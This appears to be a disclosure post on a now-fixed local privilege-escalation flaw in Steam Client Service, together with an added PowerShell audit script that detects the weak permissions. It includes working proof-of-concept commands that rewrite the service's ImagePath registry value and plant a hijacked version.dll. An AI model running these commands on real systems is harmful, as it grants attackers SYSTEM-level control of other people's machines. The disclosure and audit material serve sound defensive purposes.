The Steam Client Service can be started and stopped with user-level access, and the registry key "HKLM\SYSTEM\CurrentControlSet\Services\Steam Client Service" grants Full Control to the Users group. An attacker can therefore modify the service's registry values to gain privileged access.
POC:
reg add "HKLM\SYSTEM\CurrentControlSet\Services\Steam Client Service" /v ImagePath /d "C:\windows\system32\cmd.exe /c echo pwned > C:\0day.txt"
net start "Steam Client Service"
The default installation path also grants full access to the Users group. So version.dll, which the Steam Client Service tries to load but which does not exist on disk, can be hijacked by copying a malicious DLL renamed to version.dll into the Steam installation path (C:\Program Files (x86)\Steam\bin).
DLL Search Order Hijacking
Process Monitor shows version.dll as NAME NOT FOUND. So copy the malicious DLL to the installation bin path, renamed as version.dll, and add the ImagePath registry value as "C:\Program Files (x86)\Steam\bin\SteamService.exe /RunAsService".
POC:
copy C:\testbin\malicious.dll version.dll
reg add "HKLM\SYSTEM\CurrentControlSet\Services\Steam Client Service" /v ImagePath /d "\"C:\Program Files (x86)\Steam\bin\SteamService.exe\" /RunAsService"
net start "Steam Client Service"
Rollback :
C:\Program Files (x86)\Common Files\Steam>SteamService.exe /repair && SteamService.exe /install
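The following PowerShell audit is an added example, not part of the original post: it checks a machine for the two conditions described above (a service registry key and an install directory writable by low-privileged groups, plus a planted version.dll and an unexpected ImagePath). It assumes the default Steam install path and must run in an elevated shell to read the HKLM key's DACL reliably.

```powershell
# Added example (not from the original post): audit for weak service permissions
# and DLL hijack conditions like the Steam Client Service case described above.
$ServiceName = 'Steam Client Service'
$ServiceKey  = "HKLM:\SYSTEM\CurrentControlSet\Services\$ServiceName"
$BinPath     = 'C:\Program Files (x86)\Steam\bin'   # assumed default install path
$LowPriv     = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                 'Everyone', 'NT AUTHORITY\INTERACTIVE')

# Rights that let a low-privileged principal rewrite the key or drop files.
$RegWriteMask  = [int][System.Security.AccessControl.RegistryRights]`
    'SetValue, CreateSubKey, Delete, ChangePermissions, TakeOwnership'
$FileWriteMask = ([int][System.Security.AccessControl.FileSystemRights]`
    'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership') `
    -bor 0x40000000 -bor 0x10000000   # GENERIC_WRITE / GENERIC_ALL

# Report every Allow ACE that gives a low-privileged group any write right.
function Find-WeakAce {
    param([object[]]$Access, [string]$RightsProperty, [int]$WriteMask, [string]$Label)
    foreach ($ace in $Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPriv -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.$RightsProperty -band $WriteMask) -ne 0) {
            Write-Warning ('{0}: {1} has {2}' -f $Label, $ace.IdentityReference, $ace.$RightsProperty)
        }
    }
}

# 1. Registry key DACL (the weakness behind the first POC).
$keyAcl = Get-Acl -Path $ServiceKey
Find-WeakAce -Access $keyAcl.Access -RightsProperty RegistryRights `
             -WriteMask $RegWriteMask -Label 'Service key'

# 2. Install directory DACL (the weakness behind the DLL hijack).
$dirAcl = Get-Acl -Path $BinPath
Find-WeakAce -Access $dirAcl.Access -RightsProperty FileSystemRights `
             -WriteMask $FileWriteMask -Label 'Install dir'

# 3. Who may start/stop the service: an SDDL ACE ending in ;;;BU that contains RP
#    (SERVICE_START) or WP (SERVICE_STOP) means Builtin Users can do so.
Write-Output "Service SDDL: $(& sc.exe sdshow $ServiceName)"

# 4. Current ImagePath and evidence of a planted version.dll.
$imagePath = (Get-ItemProperty -Path $ServiceKey -Name ImagePath).ImagePath
Write-Output "ImagePath: $imagePath"
if (Test-Path (Join-Path $BinPath 'version.dll')) {
    Write-Warning "version.dll present in $BinPath (not part of a normal install)"
}
```

Any warning from the first two checks is fixed by tightening the DACL (remove the Users ACE or reduce it to read), and a changed ImagePath or a stray version.dll should be treated as an incident indicator rather than just repaired.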
B00M !!! Steam gamers' hell come !!!
Update: they have since updated and fixed it.
Ref:
https://attack.mitre.org/techniques/T1058/
https://attack.mitre.org/techniques/T1038/